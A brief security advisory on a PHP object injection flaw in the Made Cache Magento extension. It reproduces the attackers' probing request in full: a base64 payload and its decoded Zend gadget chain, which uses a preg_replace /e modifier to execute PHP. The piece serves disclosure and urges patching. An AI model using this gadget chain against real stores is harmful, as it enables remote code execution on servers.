M

Made Cache POI vulnerability

Old versions of Made Cache (Magento Block Cache & Varnish extension) are vulnerable to RCE in POI vulnerability due to unserialize call. It is fixed in this commit.

Attackers use the following request to find a vulnerable store:
GET /index.php/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJzeXNtb24iKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
Base64-decoded string results in the following PHP Object:
a:3:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";s:1:"x";O:8:"Zend_Log":1:{s:11:"*_writers";a:1:{i:0;O:20:"Zend_Log_Writer_Mail":5:{s:16:"*_eventsToMail";a:1:{i:0;i:1;}s:22:"*_layoutEventsToMail";a:0:{}s:8:"*_mail";O:9:"Zend_Mail":0:{}s:10:"*_layout";O:11:"Zend_Layout":3:{s:13:"*_inflector";O:23:"Zend_Filter_PregReplace":2:{s:16:"*_matchPattern";s:7:"/(.*)/e";s:15:"*_replacement";s:14:"exit("sysmon")";}s:20:"*_inflectorEnabled";b:1;s:10:"*_layout";s:6:"layout";}s:22:"*_subjectPrependText";N;}}}}
The PHP object is set to call exit("sysmon") or exit("MaZaYaNa") which simply prints sysmon or MaZaYaNa before exit, however they can insert any PHP code there when they find unpatched store.

If you use Made Cache extension please make sure to update it to the latest version or apply a patch from this commit.
Made Cache POI vulnerability
1 vote, 5.00 avg. rating (92% score)